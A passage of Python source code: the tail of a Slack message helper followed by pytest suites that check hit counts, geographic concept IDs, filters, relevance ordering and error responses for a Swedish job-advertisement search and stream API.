raise errors.SlackClientError
except Exception as e:
if not fail_silently:
raise e
return True
def update(self, fail_silently=True):
if self.id:
try:
client = slack.WebClient(token=settings.SLACK_TOKEN)
slack_response = client.chat_update(
channel=self.channel_id,
ts=self.id,
text=self.message,
attachments=self.attachments,
as_user=False
)
if slack_response['ok']:
self.id = slack_response['ts']
else:
raise errors.SlackClientError
except Exception as e:
if not fail_silently:
raise e
else:
if not fail_silently:
raise ValueError("Message has not been sent yet or does not have a valid timestmap")
def retrieve_slack_message(channel: str, ts: str):
if ts is None:
# This is convenient, however the channel must always be present
return None
if settings.SLACK_REDIRECT_CHANNEL:
channel = settings.SLACK_REDIRECT_CHANNEL
channel_id = get_channel_id(channel)
client = slack.WebClient(token=settings.SLACK_TOKEN)
try:
response = client.channels_history(channel=channel_id, latest=ts, inclusive=1, limit=1)
if response['ok']:
message_data = response['messages'][0]
attachments = []
for attachment_data in message_data.get('attachments', []):
attachments.append(
SlackAttachment(**attachment_data)
)
message = SlackMessage(channel=channel, message=message_data['text'], attachments=attachments)
message.id = message_data['ts']
return message
else:
raise ValueError("Message with timestamp {} does not exist in channel {}".format(ts, channel))
except errors.SlackClientError as e:
# Network or auth error. There's nothing we can do.
raise e
```
#### File: api_tests/search/test_count.py
```python
import pytest
from tests.test_resources.helper import get_search
@pytest.mark.smoke
@pytest.mark.parametrize("param_expected", [
({}, 1495),
({'q': 'C#'}, 16),
({'q': 'c-körkort'}, 5),
({'q': '.net'}, 17),
({'q': 'ci/cd'}, 8),
({'q': 'erp-system'}, 1),
({'q': 'tcp/ip'}, 2),
({'q': 'cad-verktyg'}, 1),
({'q': 'backend-utvecklare'}, 7),
({'q': 'it-tekniker'}, 9),
({'q': 'sjuksköterska'}, 126),
({'q': 'sjuksköterskor'}, 126),
({'q': 'körkort'}, 327),
({'q': 'distributör'}, 1),
({'q': 'livsmedel'}, 6),
({'q': 'sköterska'}, 3),
({'q': 'undersköterska'}, 41),
({'q': 'lärarutbildning'}, 4),
({'q': 'datasystem'}, 2),
({'q': 'undervisning'}, 54),
({'q': 'försäkring'}, 8),
({'q': 'barnmorska'}, 9),
({'q': 'tandsköterska'}, 6),
({'q': 'kock'}, 12),
({'q': 'stockholm'}, 299),
({'q': 'göteborg'}, 119),
({'q': 'malmö'}, 80),
({'q': 'uppsala'}, 38),
({'q': 'utvecklare'}, 49),
({'q': 'pizzabagare'}, 1),
({'q': 'personlig assistent'}, 51),
({'q': 'förskollärare'}, 22),
({'q': 'python'}, 23),
({'q': 'java'}, 22),
({'q': 'helsingborg'}, 28),
({'q': '<NAME>'}, 15),
({'q': '<NAME>'}, 15),
({'q': '<NAME>'}, 17),
({'q': '<NAME>'}, 9),
({'q': '<NAME>'}, 10),
({'q': 'developer engineer'}, 58),
({'q': 'python'}, 23),
({'q': 'java'}, 22),
({'q': 'java -javautvecklare'}, 19),
({'q': 'java python'}, 37),
({'q': 'java +python'}, 23),
({'q': 'java -python'}, 14),
({'q': 'kock -bagare'}, 12),
({'q': 'pizzabagare'}, 1),
({'q': 'bartender'}, 1),
({'q': 'personlig assistent'}, 51),
({'q': 'personlig assistent +göteborg'}, 6),
({'q': 'personlig assistent -göteborg'}, 45),
({'q': 'utvecklare'}, 49),
({'q': 'förskollärare'}, 22),
({'q': 'sjuksköterska'}, 126),
({'q': 'sjuksköterska -stockholm'}, 117),
({'municipality': ['AvNB_uwa_6n6', 'oYPt_yRA_Smm']}, 359),
({'municipality': 'AvNB_uwa_6n6'}, 285),
({'municipality': 'oYPt_yRA_Smm'}, 74),
({'municipality': 'PVZL_BQT_XtL'}, 117),
({'municipality': 'QiGt_BLu_amP'}, 21),
({'municipality': 'PVZL_BQT_XtL', 'region': 'CifL_Rzy_Mku'}, 527),
({'municipality': 'PVZL_BQT_XtL', 'region': 'CifL_Rzy_Mku', 'country': 'QJgN_Zge_BzJ'}, 531),
({'municipality': 'PVZL_BQT_XtL', 'region': 'CifL_Rzy_Mku', 'country': 'i46j_HmG_v64'}, 1485),
({'region': 'g5Tt_CAV_zBd'}, 34),
({'region': 'CaRE_1nn_cSU'}, 190),
({'region': 'CifL_Rzy_Mku'}, 410),
({'country': 'i46j_HmG_v64'}, 1485),
({'country': 'QJgN_Zge_BzJ'}, 4),
({'occupation-group': '7XXd_4St_nit'}, 9),
({'occupation-group': '5dxv_nVQ_N8o'}, 7),
({'occupation-group': 'BStc_SJh_DKG'}, 10),
({'occupation-group': 'Z8ci_bBE_tmx'}, 105),
({'occupation-field': 'VuuL_7CH_adj'}, 19),
({'occupation-field': 'ScKy_FHB_7wT'}, 21),
({'occupation-field': 'ASGV_zcE_bWf'}, 44),
({'occupation-field': '9puE_nYg_crq'}, 22),
({'q': 'lärare', 'published-after': '2019-01-16T07:29:52'}, 44),
({'q': 'lärare', 'published-after': '2020-12-06T07:29:52'}, 31),
({'q': 'Kundtjänstmedarbetare', 'sort': 'pubdate-asc'}, 21),
({'q': 'Kundtjänstmedarbetare', 'sort': 'pubdate-desc'}, 21),
({'q': 'lärare', 'published-after': '2019-01-16T07:29:52', 'country': 'i46j_HmG_v64', 'sort': 'pubdate-asc'}, 44),
({'q': 'lärare', 'region': ['CifL_Rzy_Mku', 'CaRE_1nn_cSU']}, 14),
({'q': 'lärare', 'region': 'CifL_Rzy_Mku'}, 11),
({'q': 'lärare', 'region': 'CaRE_1nn_cSU'}, 3),
({'q': 'lärare', 'municipality': '8deT_FRF_2SP'}, 1)
])
def test_count_and_print(session, param_expected):
p = param_expected[0]
expected = param_expected[1]
p.update({'limit': '0'})
number_of_hits = get_search(session, params=p)['total']['value']
assert number_of_hits == expected, f"Expected {expected} but got {number_of_hits}"
```
#### File: api_tests/search/test_different_number_of_results.py
```python
import sys
import pytest
from tests.test_resources.helper import get_search
@pytest.mark.slow
@pytest.mark.parametrize("relevance_threshold", [-1, 0, 0.1, 0.5, 0.8, 0.99, 1, 1.11])
def test_search_relevance_multiple_times( session, relevance_threshold):
"""
This test is created to reproduce a bug where number of hits differ between queries
"""
old_total = sys.maxsize
old_pos = sys.maxsize
failures = []
params = {'q': 'sjuksköterska', 'relevance-threshold': relevance_threshold}
for i in range(10):
result = get_search(session, params)
total = result['total']
pos = result['positions']
if i > 0: # comparison to previous result is pointless on first try
msg = f"relevance-threshold: {relevance_threshold} search {i}: Total: {total}, positions: {pos}"
pass
if old_total != total or old_pos != pos:
failures.append(msg)
old_total = total
old_pos = pos
if len(failures) > 0:
print("changes from previous searches:")
for f in failures:
print(f)
assert len(failures) == 0
```
#### File: api_tests/search/test_fetch_platsannons.py
```python
import sys
import os
import requests
import pytest
from tests.test_resources.helper import get_with_path_return_json
from tests.test_resources.settings import SEARCH_URL
@pytest.mark.smoke
@pytest.mark.integration
def test_fetch_ad_by_id( session):
"""
Get an ad by a request to /search without a query,and limiting the result to one ad
use the id of the ad when doing a request to the /ad path
verify that the id of the ad is the same as used when doing the request
"""
json_response = get_with_path_return_json( session, '/search', params={'limit': '1'})
ad_id = json_response['hits'][0]['id']
ad_response = get_with_path_return_json( session, path=f"/ad/{ad_id}", params={})
assert ad_response['id'] == ad_id
assert len(ad_response) == 33
@pytest.mark.integration
def test_fetch_not_found_ad_by_id( session):
ad_id = '823069282306928230692823069282306928230692'
r = session.get(f"{SEARCH_URL}/ad/{ad_id}", params={})
assert r.status_code == requests.codes.not_found
if __name__ == '__main__':
pytest.main([os.path.realpath(__file__), '-svv', '-ra', '-m integration'])
```
#### File: api_tests/search/test_geo_relations.py
```python
import pytest
from tests.test_resources.helper import get_search
from tests.test_resources.concept_ids import concept_ids_geo as geo
@pytest.mark.integration
@pytest.mark.parametrize("city, region, country", [
(geo.stockholm, geo.stockholms_lan, geo.sverige),
(geo.malmo, geo.skane_lan, geo.sverige)
])
def test_search_municipality( session, city, region, country):
"""
Check that parent concept ids (region, country) are correct when searching for a municipality
"""
json_response = get_search(session, {'municipality': city})
hits = json_response['hits']
for hit in hits:
assert hit['workplace_address']['municipality_concept_id'] == city
assert hit['workplace_address']['region_concept_id'] == region
assert hit['workplace_address']['country_concept_id'] == country
@pytest.mark.integration
@pytest.mark.parametrize("cities, region, country", [
([geo.kiruna, geo.lulea, geo.gallivare, geo.kalix, geo.alvsbyn, geo.jokkmokk, geo.overtornea], geo.norrbottens_lan, geo.sverige),
([geo.malmo, geo.lund ,geo.bastad, geo.sjobo, geo.kavlinge, geo.helsingborg, geo.angelholm, geo.hoor, geo.hassleholm], geo.skane_lan,
geo.sverige),
])
def test_search_region( session, cities, region, country):
"""
Check that parent (country) and child (municipality) concept ids are correct when searching for ads in a region
"""
json_response = get_search(session, {'region': region})
hits = json_response['hits']
for hit in hits:
assert hit['workplace_address']['municipality_concept_id'] in cities
assert hit['workplace_address']['region_concept_id'] == region
assert hit['workplace_address']['country_concept_id'] == country
@pytest.mark.integration
@pytest.mark.parametrize("country", [geo.norge, geo.aland_tillhor_finland, geo.malta, geo.schweiz])
def test_search_country_except_sweden( session, country):
"""
Test that countries except Sweden do not have concept ids for municipality and region.
"""
json_response = get_search(session, {'country': country})
hits = json_response['hits']
for hit in hits:
assert hit['workplace_address']['municipality_concept_id'] is None
assert hit['workplace_address']['region_concept_id'] is None
assert hit['workplace_address']['country_concept_id'] == country
@pytest.mark.integration
def test_search_country_sweden( session):
"""
Test that concept ids for municipality and region exists when searching for ads in Sweden
"""
country = geo.sverige
json_response = get_search(session, {'country': country})
hits = json_response['hits']
for hit in hits:
assert hit['workplace_address']['municipality_concept_id'] is not None
assert hit['workplace_address']['region_concept_id'] is not None
assert hit['workplace_address']['country_concept_id'] == country
```
#### File: api_tests/search/test_query_params.py
```python
import pytest
from tests.test_resources.settings import DAWN_OF_TIME, NUMBER_OF_ADS, current_time_stamp
from tests.test_resources.helper import get_search, compare
from sokannonser.settings import POSITION, POSITION_RADIUS
@pytest.mark.parametrize('params, expected_number_of_hits', [
({'published-before': '2020-12-23T00:00:01'}, NUMBER_OF_ADS),
({'published-before': current_time_stamp}, NUMBER_OF_ADS),
({'published-before': DAWN_OF_TIME}, 0),
({'published-before': '2020-11-01T00:00:01'}, 116),
({'published-before': '2020-11-25T07:29:41'}, 289),
({'published-after': '2020-11-01T00:00:01'}, 1379),
({'published-after': '2020-12-01T00:00:01'}, 1094),
({'published-after': '2020-12-10T00:00:01'}, 739),
({'published-after': '2020-12-22T00:00:01'}, 4),
({'published-after': DAWN_OF_TIME}, NUMBER_OF_ADS),
({'published-after': current_time_stamp}, 0),
({'published-after': '2020-12-15T00:00:01', 'published-before': '2020-12-20T00:00:01'}, 368),
({'published-after': '2020-12-01T00:00:01', 'published-before': '2020-12-10T00:00:01'}, 355),
({'published-after': '2020-12-11T00:00:01', 'published-before': '2020-12-15T00:00:01'}, 153),
({'published-after': current_time_stamp, 'published-before': DAWN_OF_TIME}, 0),
])
def test_query_params_date(session, params, expected_number_of_hits):
"""
Test 'published-before' and 'published-after' query parameters
With a narrower time span, lower number of hits are returned
"""
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
@pytest.mark.parametrize('params, expected_number_of_hits', [({'experience': 'true'}, 1193),
({'experience': 'false'}, 302),
])
def test_query_params_experience(session, params, expected_number_of_hits):
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
@pytest.mark.parametrize('params, expected_number_of_hits', [
({'parttime.min': '50'}, 1272),
({'parttime.min': '80'}, 1236),
({'parttime.min': '20'}, 1297),
({'parttime.max': '80'}, 26),
({'parttime.max': '50'}, 10),
({'parttime.max': '20'}, 4)
])
def test_query_params_part_time(session, params, expected_number_of_hits):
"""
Test 'parttime.min' and 'parttime.max' query parameters
"""
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
@pytest.mark.parametrize('params, expected_number_of_hits', [
({POSITION: '59.3,18.0'}, 27), # stockholm
({POSITION: '59.3,18.0', POSITION_RADIUS: 6}, 250),
({POSITION: '59.3,18.0', POSITION_RADIUS: 10}, 313),
({POSITION: '59.3,18.0', POSITION_RADIUS: 50}, 398),
({POSITION: '59.3,18.0', POSITION_RADIUS: 100}, 495),
({POSITION: '56.9,12.5', POSITION_RADIUS: 100}, 233),
({POSITION: '56.9,12.5', POSITION_RADIUS: 50}, 26),
({POSITION: '56.9,12.5', POSITION_RADIUS: 10}, 7),
({POSITION: '18.0,59.3'}, 0) # lat long reversed
])
def test_query_params_geo_position(session, params, expected_number_of_hits):
"""
Test 'position' query parameter along with 'position-radius'
With larger radius, more hits are returned
"""
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
@pytest.mark.parametrize('params, expected_number_of_hits',
[
({'employer': 'västra götalandsregionen'}, 17),
({'employer': 'Jobtech'}, 0),
({'employer': 'Region Stockholm'}, 128),
# Todo: this is way too much
({'employer': 'City Gross Sverige AB'}, 1033),
({'employer': 'City Dental i Stockholm AB'}, 1064),
({'employer': 'Premier Service Sverige AB'}, 1035),
({'employer': 'Smartbear Sweden AB'}, 1032),
# probably too much:
({'employer': 'Malmö Universitet'}, 46),
({'employer': 'Göteborgs Universitet'}, 44),
({'employer': '<NAME>'}, 8),
({'employer': '<NAME>'}, 24),
({'employer': '"<NAME>"'}, 24), # quoted string for employer
])
def test_query_params_employer(session, params, expected_number_of_hits):
"""
This test return too many hits
it will return hits where company name has one of the words in the employer name (e.g. 'Sverige')
keeping it to document current behavior
"""
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
```
#### File: api_tests/search/test_remote_work_with_other_params.py
```python
import pytest
from sokannonser.settings import OCCUPATION, OCCUPATION_GROUP, OCCUPATION_FIELD, MUNICIPALITY
from tests.test_resources.concept_ids import occupation, occupation_group, occupation_field, concept_ids_geo as geo
from tests.test_resources.helper import get_total
from tests.test_resources.settings import NUMBER_OF_ADS
from sokannonser.settings import REMOTE, UNSPECIFIED_SWEDEN_WORKPLACE, ABROAD, PUBLISHED_BEFORE, PUBLISHED_AFTER, \
EXPERIENCE_REQUIRED
TEST_DATE = "2020-12-10T23:59:59"
NUMBER_OF_REMOTE_ADS = 11
@pytest.mark.parametrize("params, expected", [
({REMOTE: True, 'q': 'utvecklare'}, 2),
({REMOTE: False, 'q': 'utvecklare'}, 47),
({REMOTE: None, 'q': 'utvecklare'}, 49),
({REMOTE: True, 'q': 'säljare'}, 1),
({REMOTE: False, 'q': 'säljare'}, 59),
({REMOTE: None, 'q': 'säljare'}, 60),
({REMOTE: True, OCCUPATION: occupation.saljkonsulent}, 1),
({REMOTE: None, OCCUPATION: occupation.saljkonsulent}, 2),
({REMOTE: False, OCCUPATION: occupation.saljkonsulent}, 1),
({OCCUPATION: occupation.saljkonsulent}, 2),
({OCCUPATION: occupation.mjukvaruutvecklare}, 20),
({REMOTE: True, OCCUPATION: occupation.mjukvaruutvecklare}, 0),
({REMOTE: False, OCCUPATION: occupation.mjukvaruutvecklare}, 20),
])
def test_remote_occupation(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({REMOTE: True, OCCUPATION_GROUP: occupation_group.mjukvaru__och_systemutvecklare_m_fl_}, 3),
({REMOTE: None, OCCUPATION_GROUP: occupation_group.mjukvaru__och_systemutvecklare_m_fl_}, 88),
({REMOTE: False, OCCUPATION_GROUP: occupation_group.mjukvaru__och_systemutvecklare_m_fl_}, 85),
({REMOTE: True, OCCUPATION_GROUP: occupation_group.telefonforsaljare_m_fl_}, 0),
({REMOTE: None, OCCUPATION_GROUP: occupation_group.telefonforsaljare_m_fl_}, 24),
({REMOTE: True, OCCUPATION_GROUP: occupation_group.foretagssaljare}, 2),
({REMOTE: None, OCCUPATION_GROUP: occupation_group.foretagssaljare}, 66),
])
def test_remote_occupation_group(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({REMOTE: True, OCCUPATION_FIELD: occupation_field.data_it}, 3),
({REMOTE: None, OCCUPATION_FIELD: occupation_field.data_it}, 156),
({REMOTE: True, OCCUPATION_FIELD: occupation_field.forsaljning__inkop__marknadsforing}, 3),
({REMOTE: None, OCCUPATION_FIELD: occupation_field.forsaljning__inkop__marknadsforing}, 188),
({REMOTE: False, OCCUPATION_FIELD: occupation_field.forsaljning__inkop__marknadsforing}, 185),
])
def test_remote_occupation_field(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({'q': 'Stockholm'}, 299),
({REMOTE: True, 'q': 'Stockholm'}, 4),
({REMOTE: False, 'q': 'Stockholm'}, 295),
({MUNICIPALITY: geo.stockholm}, 285),
({REMOTE: True, MUNICIPALITY: geo.stockholm}, 3),
({REMOTE: False, MUNICIPALITY: geo.stockholm}, 282),
])
def test_remote_municipality(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({'q': 'Stockholms Län'}, 410),
({REMOTE: True, 'q': 'Stockholms Län'}, 3),
({REMOTE: False, 'q': 'Stockholms Län'}, 407),
({'region': geo.stockholms_lan}, 410),
({REMOTE: True, 'region': geo.stockholms_lan}, 3),
({REMOTE: False, 'region': geo.stockholms_lan}, 407),
({REMOTE: None, 'region': geo.vastra_gotalands_lan}, 220),
({REMOTE: True, 'region': geo.vastra_gotalands_lan}, 1),
({REMOTE: False, 'region': geo.vastra_gotalands_lan}, 219),
({'region': geo.vastra_gotalands_lan, 'q': 'säljare'}, 9),
({REMOTE: False, 'region': geo.vastra_gotalands_lan, 'q': 'säljare'}, 9),
({REMOTE: True, 'region': geo.vastra_gotalands_lan, 'q': 'säljare'}, 0),
])
def test_remote_region(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({PUBLISHED_AFTER: TEST_DATE}, 674),
({REMOTE: True, PUBLISHED_AFTER: TEST_DATE}, 6),
({PUBLISHED_BEFORE: TEST_DATE}, 821),
({REMOTE: True, PUBLISHED_BEFORE: TEST_DATE}, 5)
])
def test_remote_publish_date(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({ABROAD: True}, 10),
({ABROAD: False}, NUMBER_OF_ADS),
({REMOTE: True, ABROAD: True}, 0),
({REMOTE: True, ABROAD: False}, NUMBER_OF_REMOTE_ADS), # abroad False does nothing
])
def test_abroad(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({UNSPECIFIED_SWEDEN_WORKPLACE: True}, 46),
({UNSPECIFIED_SWEDEN_WORKPLACE: False}, NUMBER_OF_ADS),
({REMOTE: True, UNSPECIFIED_SWEDEN_WORKPLACE: True}, 3),
({REMOTE: True, UNSPECIFIED_SWEDEN_WORKPLACE: False}, NUMBER_OF_REMOTE_ADS)
])
def test_unspecified_workplace(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize('params, expected', [
({EXPERIENCE_REQUIRED: True}, 1193),
({EXPERIENCE_REQUIRED: False}, 302),
({REMOTE: True, EXPERIENCE_REQUIRED: True}, 10),
({REMOTE: False, EXPERIENCE_REQUIRED: True}, 1183),
({REMOTE: True, EXPERIENCE_REQUIRED: False}, 1),
({REMOTE: False, EXPERIENCE_REQUIRED: False}, 301)
])
def test_experience(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({REMOTE: True, 'q': '-Stockholm'}, 7),
({REMOTE: True, MUNICIPALITY: f"-{geo.stockholm}"}, 8),
({REMOTE: True, 'region': f"-{geo.stockholms_lan}"}, 8),
({REMOTE: True, 'region': f"-{geo.vastra_gotalands_lan}"}, 10),
({REMOTE: True, 'region': f"-{geo.skane_lan}"}, 10),
({REMOTE: True, 'region': f"-{geo.norrbottens_lan}"}, 10),
])
def test_remote_negative_geography(session, params, expected):
"""
Negative geographical parameters
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
def test_combination_municipality(session):
"""
numbers for REMOTE True + REMOTE False should add upp to numbers when not using REMOTE
AND condition between REMOTE and other params
"""
number_region = get_total(session, {'municipality': geo.stockholm})
number_remote = get_total(session, {REMOTE: True, 'municipality': geo.stockholm})
number_not_remote = get_total(session, {REMOTE: False, 'municipality': geo.stockholm})
assert number_remote + number_not_remote == number_region
def test_combination_region(session):
"""
numbers for REMOTE True + REMOTE False should add upp to numbers when not using REMOTE
AND condition between REMOTE and other params
"""
number_region = get_total(session, {'region': geo.stockholms_lan})
number_remote = get_total(session, {REMOTE: True, 'region': geo.stockholms_lan})
number_not_remote = get_total(session, {REMOTE: False, 'region': geo.stockholms_lan})
assert number_remote + number_not_remote == number_region
@pytest.mark.parametrize("param, expected", [
({REMOTE: False, REMOTE: True}, NUMBER_OF_REMOTE_ADS),
({REMOTE: True, REMOTE: False}, (NUMBER_OF_ADS - NUMBER_OF_REMOTE_ADS)),
({REMOTE: True, REMOTE: False, REMOTE: True}, NUMBER_OF_REMOTE_ADS)
])
def test_duplicate_remote_param(session, param, expected):
"""
with duplicated params, value of last param is used
"""
assert get_total(session, params=param) == expected
```
#### File: api_tests/search/test_search_logic.py
```python
import sys
import json
import pytest
from tests.test_resources.concept_ids import concept_ids_geo as geo
from tests.test_resources.helper import get_search, get_search_check_number_of_results, check_freetext_concepts
from tests.test_resources.settings import TEST_USE_STATIC_DATA
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on a fixed set of ads")
@pytest.mark.integration
@pytest.mark.parametrize("query, municipality, code, municipality_concept_id, expected_number_of_hits", [
('bagare stockholm', 'Stockholm', '0180', geo.stockholm, 0),
('lärare stockholm', 'Stockholm', '0180', geo.stockholm, 11),
('lärare göteborg', 'Göteborg', '1480', geo.goteborg, 6),
])
def test_freetext_work_and_location_details(session, query, municipality, code, municipality_concept_id,
expected_number_of_hits):
params = {'q': query, 'limit': '100'}
response = get_search_check_number_of_results(session, expected_number_of_hits, params)
response_json = json.loads(response.content.decode('utf8'))
for ad in response_json['hits']:
print(ad['id'])
assert ad['workplace_address']['municipality'] == municipality
assert ad['workplace_address']['municipality_code'] == code
assert ad['workplace_address']['municipality_concept_id'] == municipality_concept_id
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on a fixed set of ads")
@pytest.mark.parametrize("query, expected_ids_and_relevance", [
('sjuksköterska läkare Stockholm Göteborg', [
('24429701', 1.0),
('24402238', 1.0),
('24398617', 0.8741737070842681),
('24312980', 0.8741737070842681),
('24418102', 0.7045549889157827),
('24416155', 0.7045549889157827),
('24425309', 0.5787286960000507),
('24420444', 0.5787286960000507),
('24403543', 0.5787286960000507),
('24403071', 0.5787286960000507),
('24395432', 0.5787286960000507),
('24369160', 0.5787286960000507),
('24225167', 0.5787286960000507),
('24202976', 0.5787286960000507),
('24420717', 0.428879288175419),
('24408926', 0.25384773681085276)
])])
def test_freetext_two_work_and_two_locations_check_order(session, query, expected_ids_and_relevance):
"""
Tests that the sorting order of hits is as expected and that relevance value has not changed
This documents current behavior
"""
params = {'q': query, 'limit': '100'}
response_json = get_search(session, params)
old_relevance = 1
for index, hit in enumerate(response_json['hits']):
relevance = hit['relevance']
assert old_relevance >= relevance # check that results are presented in ascending relevance order
assert hit['id'] == expected_ids_and_relevance[index][0]
assert hit['relevance'] == expected_ids_and_relevance[index][1], hit['id']
old_relevance = relevance
@pytest.mark.parametrize("query, top_id, expected_number_of_hits", [
('bagare kock Stockholm Göteborg', '24274093', 1),
('kock bagare Stockholm Göteborg', '24274093', 1),
('kallskänka kock Stockholm Göteborg', '24274093', 1),
('lärare lågstadielärare Malmö Göteborg', '24439613', 9),
])
def test_freetext_two_work_and_two_locations(session, query, top_id, expected_number_of_hits):
"""
Test that the top hit for a search has not changed and that the number of hits for query has not changed
This documents current behavior
"""
params = {'q': query, 'limit': '100'}
response = get_search_check_number_of_results(session, expected_number_of_hits, params)
response_json = json.loads(response.content.decode('utf8'))
if TEST_USE_STATIC_DATA:
assert response_json['hits'][0]['id'] == top_id
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on a fixed set of ads")
@pytest.mark.integration
@pytest.mark.parametrize("query, expected_number, top_id", [
('Bauhaus Kundtjänst', 38, '24419003'),
('Sirius crew', 2, '24416669'),
('super', 6, '24361060'),
('Säsong', 2, '24404500'),
])
def test_freetext_search(session, query, expected_number, top_id):
"""
Tests from examples
Test that specific queries should return only one hit (identified by id)
and that freetext concepts are not included in search result
"""
params = {'q': query, 'limit': '40'}
response = get_search_check_number_of_results(session, expected_number=expected_number, params=params)
response_json = json.loads(response.content.decode('utf8'))
# freetext concepts should be empty
check_freetext_concepts(response_json['freetext_concepts'], [[], [], [], [], [], [], [], [], []])
if TEST_USE_STATIC_DATA:
assert response_json['hits'][0]['id'] == top_id
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on a fixed set of ads")
def test_search_rules(session):
params = {'q': "systemutvecklare python java stockholm sopra", 'limit': '1'}
response_json = get_search(session, params=params)
hit = response_json['hits'][0]
check_freetext_concepts(response_json['freetext_concepts'],
[['python', 'java'], ['systemutvecklare'], ['stockholm'], [], [], [], [], [], []])
assert 'sopra' in hit['employer']['name'].lower()
assert 'sopra' in hit['employer']['workplace'].lower()
assert 'systemutvecklare' in hit['occupation']['label'].lower()
assert hit['workplace_address']['municipality'] == 'Stockholm'
```
#### File: api_tests/stream/test_stream_errors.py
```python
import pytest
import requests
import tests.test_resources
from sokannonser.settings import LOCATION_CONCEPT_ID, OCCUPATION_CONCEPT_ID, ABROAD
from tests.test_resources.concept_ids import concept_ids_geo as geo, occupation as work, occupation_group as group
from tests.test_resources.helper import get_stream_expect_error, get_stream_check_number_of_results, get_stream, \
check_ads_for_country_in_address
from tests.test_resources.settings import DAWN_OF_TIME
@pytest.mark.parametrize("wrong_date", ['2020-13-25T00:00:00', '20-00-25T00:00:00', '0001-00-01', 'T11:28:00'])
def test_wrong_date_format(session_stream, wrong_date):
get_stream_expect_error(session_stream, params={'date': wrong_date}, expected_http_code=requests.codes.bad_request)
@pytest.mark.parametrize('path', ['/stream', '/snapshot'])
def test_filter_wrong_api_key_expect_unauthorized_response(session_stream, path):
"""
test that a 'unauthorized' response (http 401) is returned when doing a request with an incorrect api key
"""
session_stream.headers.update({'api-key': 'wrong key'})
params = {LOCATION_CONCEPT_ID: geo.stockholm}
expected_http_code = requests.codes.unauthorized
try:
get_stream_expect_error(session_stream, params, expected_http_code)
finally: # restore headers in session_stream object
session_stream.headers.update(tests.test_resources.settings.headers_stream)
@pytest.mark.parametrize('type, value', [
(OCCUPATION_CONCEPT_ID, work.bartender),
(LOCATION_CONCEPT_ID, geo.stockholm)])
def test_filter_without_date_expect_bad_request_response(session_stream, type, value):
"""
test that a 'bad request' response (http 400) is returned when doing a request without date parameter
"""
get_stream_expect_error(session_stream, params={type: value}, expected_http_code=requests.codes.bad_request)
@pytest.mark.parametrize('work, expected_number_of_hits', [
(group.mjukvaru__och_systemutvecklare_m_fl_, 88),
(group.mjukvaru__och_systemutvecklare_m_fl_.lower(), 0)])
def test_filter_with_lowercase_concept_id(session_stream, work, expected_number_of_hits):
"""
compare correct concept_id with a lower case version
"""
params = {'date': DAWN_OF_TIME, OCCUPATION_CONCEPT_ID: work}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize("abroad", [True, False])
def test_work_abroad(session, abroad):
"""
Check that param 'arbete-utomlands' returns http 400 BAD REQUEST for stream
"""
get_stream_expect_error(session, {ABROAD: abroad}, expected_http_code=requests.codes.bad_request)
```
#### File: api_tests/stream/test_stream_filter.py
```python
import pytest
from sokannonser.settings import OCCUPATION_CONCEPT_ID, LOCATION_CONCEPT_ID, UPDATED_BEFORE_DATE
from tests.test_resources.settings import NUMBER_OF_ADS, DAWN_OF_TIME, current_time_stamp
import tests.test_resources.concept_ids.concept_ids_geo as geo
import tests.test_resources.concept_ids.occupation as work
import tests.test_resources.concept_ids.occupation_group as group
import tests.test_resources.concept_ids.occupation_field as field
from tests.test_resources.helper import get_stream_check_number_of_results
@pytest.mark.parametrize('date, work, expected_number_of_hits', [
(DAWN_OF_TIME, group.arbetsformedlare, 7),
(DAWN_OF_TIME, group.apotekare, 0),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, 88),
(DAWN_OF_TIME, work.mjukvaruutvecklare, 20),
(DAWN_OF_TIME, work.arbetsterapeut, 3)])
def test_filter_only_on_occupation(session_stream, date, work, expected_number_of_hits):
"""
Returns number of hits in the db. Temporary to verify results in other tests
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, geo, expected_number_of_hits', [
(DAWN_OF_TIME, geo.aland_tillhor_finland, 0),
(DAWN_OF_TIME, geo.norge, 4),
(DAWN_OF_TIME, geo.malta, 0),
(DAWN_OF_TIME, geo.schweiz, 1),
(DAWN_OF_TIME, geo.kalmar_lan, 38),
(DAWN_OF_TIME, geo.botkyrka, 6),
(DAWN_OF_TIME, geo.stockholms_lan, 410),
(DAWN_OF_TIME, geo.stockholm, 285),
(DAWN_OF_TIME, geo.sverige, 1485)])
def test_filter_only_on_location(session_stream, date, geo, expected_number_of_hits):
"""
Returns number of hits in the db. Temporary to verify results in other tests
"""
params = {'date': date, LOCATION_CONCEPT_ID: geo}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work, geo, expected_number_of_hits', [
(DAWN_OF_TIME, work.larare_i_fritidshem_fritidspedagog, geo.vastra_gotalands_lan, 2),
